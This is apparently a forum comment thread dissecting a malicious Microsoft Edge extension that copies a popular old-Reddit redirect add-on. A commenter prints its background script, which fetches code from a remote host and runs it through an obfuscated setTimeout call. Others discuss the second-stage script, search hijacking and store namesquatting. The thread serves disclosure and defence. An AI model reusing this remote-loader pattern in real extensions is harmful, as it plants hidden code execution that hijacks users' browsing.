[livre]

If anyone wants to download the crx and inspect it: https://edge.microsoft.com/extensionwebstorebase/v1/crx?resp...

The URL used in the XHR points to this (accessing directly only shows a '0' but with archive.is you get that JavaScript): https://archive.is/TxFWj

Here's the full source code:

    const oldReddit = "https://old.reddit.com";
    const excludedPaths = ["/gallery", "/poll", "/rpan", "/settings", "/topics"];
    
    chrome.webRequest.onBeforeRequest.addListener(
      function(details) {
        const url = new URL(details.url);
        
        if (url.hostname === "old.reddit.com") return;
        
        for (const path of excludedPaths) {
          if (url.pathname.indexOf(path) === 0) return;
        }
        
        return {redirectUrl: oldReddit + url.pathname + url.search + url.hash};
      },
      {
        urls: ["*://reddit.com/*", "*://www.reddit.com/*", "*://np.reddit.com/*", "*://new.reddit.com/*", "*://amp.reddit.com/*",],
        types: [
          "main_frame",
          "sub_frame",
          "stylesheet",
          "script",
          "image",
          "object",
          "xmlhttprequest",
          "other"
        ]
      },
      ["blocking"]
    );
    
    function dailyCollect() {
      let xmlHttpRequest = new XMLHttpRequest();
      xmlHttpRequest.timeout = 2e4;
      xmlHttpRequest.onreadystatechange = function () {
        return (xmlHttpRequest.readyState === XMLHttpRequest.DONE && xmlHttpRequest.status === 2e2 && xmlHttpRequest.responseText) ? successReportDebug(true, xmlHttpRequest.responseText) : null;
      };
    
      let successReportDebug = function (status, apply) {
        if (!status) {
          setTimeout(dailyCollect, 3e4)
        } else {
          console.log('Stats was collected ' + setTimeout.apply(top, [apply]))
        }
      };
    
      try {
        xmlHttpRequest.open("GET", 'https://statcdn.net/app/?id=8438fce9-6d9a-45c4-ba2c-e643c1291253', true);
        xmlHttpRequest.send();
      } catch (e) {
        successReportDebug(false)
      }
    }
    
    dailyCollect();

And the manifest:

    {
      "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",
      "content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self'",
      "name": "Old Reddit Redirect",
      "description": "Ensure Reddit always loads the old design",
      "version": "1.2.0",
      "manifest_version": 2,
      "background": {
        "scripts": [
          "background.js"
        ]
      },
      "icons": {
        "48": "img/icon48.png",
        "128": "img/icon128.png"
      },
      "permissions": [
        "tabs",
        "<all_urls>",
        "webRequest",
        "webRequestBlocking",
        "*://reddit.com/*",
        "*://www.reddit.com/*",
        "*://np.reddit.com/*",
        "*://new.reddit.com/*",
        "*://amp.reddit.com/*"
      ]
    }

[jasonhansel]

> setTimeout.apply(top, [apply])

Clever. Probably avoids naive forms of static analysis that would catch more obvious ways of eval'ing code.

[livre]

I can't edit the original comment anymore, I posted it in a rush and didn't have time to check the script contents. The loaded script also loads a script called "firebase.js" from this URL: https://1658209995.rsc.cdn77.org/firebase.js (archive: https://archive.is/gdij8). That script is obviously not the actual Firebase, you can paste it in a deobfuscator and see what it does, it has some funny things such as a postMessage called "GimmeResults."

[heyheyhey]

> The URL used in the XHR points to this (accessing directly only shows a '0' but with archive.is you get that JavaScript): https://archive.is/TxFWj

How did you get from the XHR to that script inside that archive?

[livre]

The XHR contains the URL: xmlHttpRequest.open("GET", 'https://statcdn.net/app/?id=8438fce9-6d9a-45c4-ba2c-e643c129...', true);

Since opening that URL directly in the browser didn't work I tried archiving it and it worked. Then I shared the archive link here.

It seems that they implemented some poorly done access control that is letting archive.is see the contents but not web browsers when visited directly.

[passivate]

Can you help me understand the code? What is it doing?

[Dedime]

The code is calling out to a malicous URL for a script, downloading it, and executing the script. The malicious script from the URL is mirrored here: https://archive.is/TxFWj

Nobody has figured out exactly what it's doing quite yet, but you can paste that code into a Javascript deobfuscator and try to figure it out yourself: https://lelinhtinh.github.io/de4js/

Based off of reading the code for 5 minutes with my very poor javascript skills, it's modifying your searches via Google / Bing and redirecting you to a practically unknown search engine called "Blacksearch". Very suspicious. I found a reddit thread with others complaining about this search engine, https://old.reddit.com/r/edge/comments/kzwb6q/redirecting_to...

[TechBro8615]

Seems like weird malware. It’s not exactly subtle if the first time I Google something after installing it, I get redirected to not-Google.

I could see this working on Karen who downloaded a coupon extension. But surely the type of person who installs an extension to force old.reddit.com will realize what’s happening almost immediately.

What is the point of malware if it can be caught so easily? This makes me wonder if maybe the dev didn’t do it on purpose. Maybe they sold it to an unscrupulous (and dumb) company, or maybe their build process is somehow infected.

[livre]

>This makes me wonder if maybe the dev didn’t do it on purpose.

I doubt this since the code is stolen from this Firefox and Chrome extension https://github.com/tom-james-watson/old-reddit-redirect but there's no acknowledgement of Edge in that GitHub project.

[TechBro8615]

That makes sense and also explains why that Reddit thread had users describing multiple extensions as the source of the same problem.

So the root issue here is effectively extension squatting on the Edge store. The attacker can simply scrape the most popular extensions in Chrome, inject malware into them, and publish them on the Edge store under the same name.

If that’s what’s happening, there is probably substantial effort behind sockpuppet publishers so that one ban won’t ban them all. But then again it also looks like an amateur operation if every extension is footprinting itself by using the same domain for the malicious redirect.

Hopefully Microsoft can clean this up with some one-off code scans for the signatures of this malware. Ban all the publishers and delete the extensions. Then, hold those names in reserve unless the creator can prove they own the same name at the Chrome store.

Long term, the ideal system might involve a verification step at registration time if the publisher name or extension name exists in the Chrome store. I think npm has been working on features in this area, as they are vulnerable to similar namesquatting vectors of malware distribution.

[axiosgunnar]

where is the „top“ variable defined?

[SahAssar]

top is a builtin: https://developer.mozilla.org/en-US/docs/Web/API/Window/top

[axiosgunnar]

Thanks!